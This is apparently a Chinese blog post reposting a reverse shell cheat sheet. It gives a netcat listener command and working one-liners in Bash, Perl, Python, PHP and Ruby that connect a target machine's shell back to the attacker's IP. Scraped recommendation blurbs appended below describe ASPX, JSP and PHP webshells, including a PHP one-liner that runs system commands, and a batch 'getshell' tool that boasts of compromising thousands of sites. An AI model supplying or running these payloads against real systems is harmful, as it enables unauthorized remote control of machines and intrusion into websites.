`

一句话反射shell

 
阅读更多

通过一句话反射一个shell

 

首先你在自己的及其上起一个进程来监听 mypc$ nc -l -v 0.0.0.0 4444

 

ip就是你自己的ip 端口任意(我这里写的是4444) 注意这个端口不要被自己的防火墙过滤掉 比如ubuntu上可以用 ufw allow 端口号 来打开端口。

 

后面就是到要反射的及其上输入命令

 

Bash

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL

perl -e 'use Socket;$i="你的ip";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("你的ip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

php -r '$sock=fsockopen("你的ip",4444);exec("/bin/sh -i <&3 >&3 2>&3");'



Ruby

 

ruby -rsocket -e'f=TCPSocket.open("你的ip",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
更多请看
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
http://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html



分享到:
评论

相关推荐

    ASPX一句话shell客户端+ASPXshell MS08-067插件

    ASPX一句话shell客户端和ASPXshell MS08-067插件是网络安全领域中与Web应用程序漏洞利用相关的工具。这两个概念主要涉及到的是ASP.NET Web应用程序的安全问题,以及如何利用这些工具进行渗透测试或者防御。 首先,...

    ASPX一句话shell客户端

    ASPX一句话shell客户端是Web应用程序安全领域中的一个关键概念,主要与网络安全和恶意攻击相关。在Web服务器上,ASPX是Microsoft .NET框架用于创建动态网页的一种编程语言,类似于PHP或JSP。当一个ASPX页面被恶意...

    jspshell 一句话

    【标题】"jspshell 一句话" 指的是在JavaServer Pages(JSP)环境中,通过一句简短的代码实现远程命令执行或者后门的功能,通常用于渗透测试或恶意攻击中。这种“一句话”JSP Shell是黑客常用的技术手段,能够帮助...

    一句话批量检测工具

    【标题】"一句话批量检测工具" 是一个专为IT安全专业人士设计的应用程序,它能够帮助用户快速、批量地检测潜在的Web Shell(网络后门)或其他恶意代码,以确保服务器和网站的安全性。通过该工具,用户可以一键式检查...

    php一句话cmdshell新型 (非一句话木马)

    【PHP 一句话 CMDShell 新型(非一句话木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句话 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句话木马是直接执行 PHP ...

    php一句话webshell 服务端和客户端

    php一句话webshell 服务端和客户端,一句话为 &lt;?php $_GET[2]($_GET[0]($_GET[1]));?&gt; 支持函数system,passthru,shell_exec 可以执行操作系统任意命令,windows linux unix 等。 zhaoxypass@yahoo.com.cn,欢迎...

    B shell与 C shell的区别

    C shell,全称为C shell,是另一种类型的shell。C shell的设计目的在于提供一种易于使用的shell,特别是在命令历史记录和文件名补全方面。C shell的优点是它提供了很多实用的功能,如命令历史记录、文件名补全和别名...

    shell shell练习 shell入门

    Shell是Linux和Unix系统中的命令解释器,它提供了一个用户与操作系统内核交互的界面,允许用户通过命令行执行各种操作。本篇文章将深入探讨Shell的基础知识,包括其概念、重要性、基本语法以及如何进行Shell编程练习...

    LINUX实现一个简单的SHELL

    LINUX下实现一个简单的SHELL

    shell编写 shell编写

    Shell编写是Linux或Unix系统中的一种重要技能,它涉及到脚本编程、命令行交互以及系统自动化操作。在本文中,我们将深入探讨Shell脚本的基本概念、语法结构、常见命令及其实用技巧,帮助你掌握这一强大的工具。 ...

    shell脚本大全

    在IT领域,Shell脚本是Linux和Unix操作系统中不可或缺的一部分,它是一种强大的自动化工具,能够帮助用户执行一系列命令,简化日常任务。"shell脚本大全"这个资源可能包含了大量的示例脚本,涵盖了各种用途和场景,...

    Shell源码(Shell源码)

    Shell是Unix和Linux操作系统中的命令解释器,它提供了一个用户与操作系统内核交互的界面,允许用户通过输入命令来执行系统功能。Shell不仅是一个命令行接口,还是一个强大的编程语言,用户可以编写脚本来自动化一...

    shell变量与创建子shell详解

    Shell脚本是一种强大的编程工具,它在Unix和Linux操作系统中广泛应用于自动化和任务调度。在Shell脚本中,创建子Shell是一种常见的操作,它可以提供一个隔离的执行环境,使得在其中执行的命令和脚本不会影响到父...

    Shell编程中文手册.pdf

    Shell 脚本的执行方式有两种:一种是采用 bash 或 sh 加脚本的相对路径或绝对路径,另一种是采用输入脚本的绝对路径或相对路径执行脚本,需要具有可执行权限。 Shell 中的变量 Shell 中的变量有系统变量和自定义...

    实验一shell实验报告

    实验一的焦点在于熟悉Linux操作系统的基本命令和Shell编程。Shell编程是Linux系统中的一种脚本语言,用于自动化执行一系列命令,提升系统管理效率。在这个实验中,学生将学习以下核心知识点: 1. **Linux常用命令**...

    shell教程shell脚本编写方

    当用户注册到 Unix 系统时,系统都会为用户启动一个 Shell,Shell 会一直等待用户的指令,当用户输入的命令被确认后,Shell 便对其进行解释并产生系统调用,完成相应操作,然后,又进入等待状态。 Shell 是一种命令...

    批量getshell工具新版

    批量getshell工具【2023最新】这是一种内部有多个漏洞,可自动进行url采集,自动爬虫多个引擎和友情链接url,过狗一句话,轻松日出上千。

    shell的一个IDE

    Shell编程是一种在Unix/Linux系统中广泛使用的命令行脚本语言,它基于Bourne Shell,因此也称为Bash(Bourne Again SHell)。在开发和管理Linux或Unix系统的日常工作中,Shell脚本能帮助自动化许多重复性任务,极大...

Global site tag (gtag.js) - Google Analytics